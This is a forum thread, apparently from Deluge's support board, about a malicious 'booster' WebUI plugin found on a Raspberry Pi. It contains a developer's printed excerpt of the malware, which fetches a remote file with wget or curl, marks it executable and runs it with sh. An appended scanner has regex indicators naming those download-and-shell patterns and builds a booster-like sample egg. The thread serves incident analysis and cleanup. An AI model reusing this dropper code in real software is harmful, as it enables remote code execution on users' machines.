[WebUI Vulnerability] Malicious plugin "booster" found on my system

ggez
New User
Posts: 2
Joined: Fri May 12, 2017 11:47 pm

[WebUI Vulnerability] Malicious plugin "booster" found on my system

Post by ggez »

Admin Edit: Upgrade to 1.3.15 to fix this vulnerability

I don't remember adding this plugin called booster. It was enabled under my plugins. I have uploaded the booster.egg here. Keep in mind that an .egg file can be opened as a .zip file... I can't find reference to this plugin ANYWHERE on the internet. Sorry if I'm being paranoid. I looked at the source and it seems to download and execute stuff :S

I am running deluge/deluge-web on Raspbian

https://drive.google.com/file/d/0B23kWK ... sp=sharing
Cas
Top Bloke
Posts: 3679
Joined: Mon Dec 07, 2009 6:04 am
Location: Scotland

Re: Malicious plugin "booster" found on my system?

Post by Cas »

If your webui is open to the internet it likely is a malicious egg utilising a known security flaw.

Upgrade to 1.3.15 as it has webui security fixes.
Cas
Top Bloke
Posts: 3679
Joined: Mon Dec 07, 2009 6:04 am
Location: Scotland

Re: Malicious plugin "booster" found on my system?

Post by Cas »

Also you should report this to Debian as a serious security issue.
Cas
Top Bloke
Posts: 3679
Joined: Mon Dec 07, 2009 6:04 am
Location: Scotland

Re: Malicious plugin "booster" found on my system?

Post by Cas »

It definitely is malicious; it is modified execute plugin code.
Tvich
Member
Posts: 33
Joined: Thu Apr 27, 2017 6:36 pm

Re: Malicious plugin "booster" found on my system?

Post by Tvich »

My bad, I misunderstood, thought it was Boost.Python. Don't know why. My bad :(
ggez
New User
Posts: 2
Joined: Fri May 12, 2017 11:47 pm

Re: [WebUI Vulnerability] Malicious plugin "booster" found on my system

Post by ggez »

Oh sh!t, didn't expect it to be this bad... Any idea what it might have downloaded? Are there any paths that I can check?
Cas
Top Bloke
Posts: 3679
Joined: Mon Dec 07, 2009 6:04 am
Location: Scotland

Re: [WebUI Vulnerability] Malicious plugin "booster" found on my system

Post by Cas »

There is likely no way to know for sure.

For reference, this is a partial summary of the code added to the execute plugin:

Code:

def looking_file(name):
    epath = os.environ.get("PATH", None)
    if not epath: epath = ("/usr/bin", "/usr/local/bin", "/usr/sbin", "/sbin", "/bin")
    for p in epath.split(":"):
        testname = p + "/" + name
        if os.path.exists(testname) and os.access(testname, os.X_OK):
            return testname
    return None

def internal_download(url, to):
    if sys.version_info[0] == 3:
        import urllib.request
        urllib.request.urlretrieve(url, to)
    else:
        import urllib
        urllib.urlretrieve(url, to)
    
def yahoo(URL):
    wget = looking_file("wget")
    curl = looking_file("curl")    
    cmd = None
    if wget:
        cmd = wget + " -t 0 -T 15 -q --no-check-certificate -O %s %s"
    elif curl:
        cmd = curl + " --retry 0 --connect-timeout 15 -k -q -o %s %s "
    
    tmpfile = tempfile.mkstemp()
    tmpname = tmpfile[1]
    os.fdopen(tmpfile[0]).close()
    
    if cmd:
        try:
            tcmd = cmd % (tmpname, URL)
            Popen(tcmd, shell = True, stdout = PIPE, stderr = PIPE).communicate()
        except:
            pass           
    else:
        try:
            if not os.path.exists(tmpname) or os.path.getsize(tmpname) == 0:
                internal_download(URL, tmpname)
        except Exception as err:
            return str(err)

    if os.path.exists(tmpname) and os.path.getsize(tmpname) > 0:
        try:
            os.chmod(tmpname, 0555)
            Popen("sh %s &" % tmpname, shell = True, stdout = PIPE, stderr = PIPE).communicate()
            time.sleep(2)
            os.remove(tmpname)
        except Exception as err:
            return str(err)
    return "OK"
    
    def get_file(self, filename):
        if os.path.exists(filename):
            fp = open(filename)
            data = fp.read()
            fp.close()
            return data
        else:
            return "FILE %s not exists" % filename
eb98jdb
New User
Posts: 3
Joined: Sat Jan 20, 2018 10:34 am

Re: [WebUI Vulnerability] Malicious plugin "booster" found on my system

Post by eb98jdb »

How do you remove this malware?
Shryp
Moderator
Posts: 521
Joined: Mon Apr 20, 2015 10:20 pm

Re: [WebUI Vulnerability] Malicious plugin "booster" found on my system

Post by Shryp »

eb98jdb wrote: How do you remove this malware?
I am not sure about this as I have never had the issue, but on my system plugins are saved in
/home/[USER NAME]/.config/deluge/plugins
and also
/home/[USER NAME]/.cache/Python-Eggs/

I would shut down deluge and remove them from there as a first step.
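As an added example (not code from this thread or from the Deluge project), the check below opens every .egg in a plugin directory as a zip archive, as ggez notes is possible, and flags source files that carry the download-and-execute patterns visible in the booster code Cas quoted. The two sample eggs it builds are constructed for the demonstration, and the indicator regexes are assumptions derived from that quoted code, not a Deluge or Debian signature.

```python
import os, re, tempfile, zipfile

# Indicators derived from the "booster" code quoted earlier in this thread: a
# wget/curl/urlretrieve download, Popen(shell=True), chmod 0555 and "sh <file> &".
SUSPICIOUS = {
    "downloader": re.compile(r'urlretrieve\(|looking_file\("(wget|curl)"\)'),
    "shell_popen": re.compile(r"Popen\(.*shell\s*=\s*True"),
    "chmod_exec": re.compile(r"os\.chmod\(.*,\s*0o?555\)"),
    "sh_background": re.compile(r'"sh %s &"'),
}

def scan_egg(path):
    """Open the .egg as a zip and return the indicator names matched in any .py member."""
    hits = set()
    with zipfile.ZipFile(path) as egg:
        for member in egg.namelist():
            if member.endswith(".py"):
                src = egg.read(member).decode("utf-8", errors="replace")
                hits.update(n for n, p in SUSPICIOUS.items() if p.search(src))
    return sorted(hits)

def scan_plugin_dirs(dirs):
    """Scan every .egg in the given directories (e.g. ~/.config/deluge/plugins); returns {path: hits}."""
    report = {}
    for d in dirs:
        for fn in (sorted(os.listdir(d)) if os.path.isdir(d) else []):
            if fn.endswith(".egg"):
                p = os.path.join(d, fn)
                try:
                    report[p] = scan_egg(p)
                except zipfile.BadZipFile:  # a non-zip "egg" is itself worth a manual look
                    report[p] = ["not_a_zip"]
    return report

# Constructed sample eggs (not real plugins): one echoing the quoted booster code, one benign.
BOOSTER_LIKE = '''def yahoo(URL):
    Popen(looking_file("wget") + " -O %s %s" % (tmp, URL), shell = True).communicate()
    os.chmod(tmp, 0555)
    Popen("sh %s &" % tmp, shell = True).communicate()
'''
BENIGN = '''def get_file(filename):
    return open(filename).read()
'''
def build_demo_dir(directory=None):
    """Write the two sample eggs into `directory` (a fresh temp dir by default) and return it."""
    directory = directory or tempfile.mkdtemp()
    for name, src in (("booster.egg", BOOSTER_LIKE), ("Example-1.0.egg", BENIGN)):
        with zipfile.ZipFile(os.path.join(directory, name), "w") as egg:
            egg.writestr("plugin/core.py", src)
    return directory
```

Point scan_plugin_dirs at the two directories Shryp lists to check a live installation; a flagged egg still deserves a manual read of its members before deciding what it did.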